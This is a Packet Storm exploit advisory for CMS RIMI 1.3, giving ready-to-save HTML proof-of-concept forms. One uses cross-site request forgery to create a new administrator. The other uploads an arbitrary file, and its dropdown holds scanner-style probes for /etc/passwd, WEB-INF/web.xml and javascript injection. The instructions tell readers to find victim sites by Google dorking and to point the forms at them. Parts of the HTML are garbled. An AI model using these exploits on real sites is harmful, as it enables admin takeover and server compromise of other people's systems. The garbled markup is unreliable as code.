Security
Headlines
HeadlinesLatestCVEs

Headline

CMS RIMI 1.3 Cross Site Request Forgery / File Upload

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

Packet Storm
#csrf#vulnerability#web#windows#google#git#java#php#auth#firefox

=============================================================================================================================================
| # Title : CMS RIMI v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://github.com/myroot593/RIMICMS |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply .

[+] save code as poc.html .

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Profile User Form</title>
</head>
<body>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">
<!-- Text input for username -->
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>

    <!-- Password input for password -->  
    <label for="password">Password:</label>  
    <input type="password" id="password" name="password" required>

    <!-- Password input for confirm password -->  
    <label for="confirm_password">Confirm Password:</label>  
    <input type="password" id="confirm_password" name="confirm_password" required>

    <!-- Text input for name -->  
    <label for="nama">Nama:</label>  
    <input type="text" id="nama" name="nama" required>

    <!-- Text input for email -->  
    <label for="email">Email:</label>  
    <input type="email" id="email" name="email" required>

    <!-- Hidden input for user ID -->  
    <input type="hidden" name="id" value="">

    <!-- Submit button -->  
    <button type="submit">Submit</button>  
</form>  

</body>
</html>

------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------

[+] Go to the line 3.

[+] Set the target site link Save changes and apply .

[+] Your file : 127.0.0.1/cmsrimi/content

[+] save code as poc.html .

<p class="sukses-form"></p>
<p class="error-form"></p>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">
<div class="form-group “>
<label>Judul :</label>
<input type="text” name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">
<span><p class="error-form"></p></span>
</div>
<div class="form-group “>
<label>Isi Berita :</label>
<textarea class="ckeditor” name="isi_berita" id="isi_berita"></textarea>
<span><p class="error-form"></p></span>
</div>
<div class="form-group">
<label>Kategori Berita :</label>
<select class=’form-control’ name=’kategori_berita’ id=’kategori_berita’ required=’’><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|||>!(()&&!|||</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=’"()>’"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1’">1’"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=’">’"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!–><!–</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p>
</div>
<div class="form-group">
<label>Status:</label>
<select class="form-control" name="status_berita" id="status_berita">
<option value="Diterbitkan">Diterbitkan</option>
<option value="Draft">Draft</option>
</select>
</div>
<div class="form-group">
<label>Gambar Berita</label>
<input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">
<input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">
<p class="error-form"></p>
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
<p class="error-form"></p>
<p class="error-form"></p>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution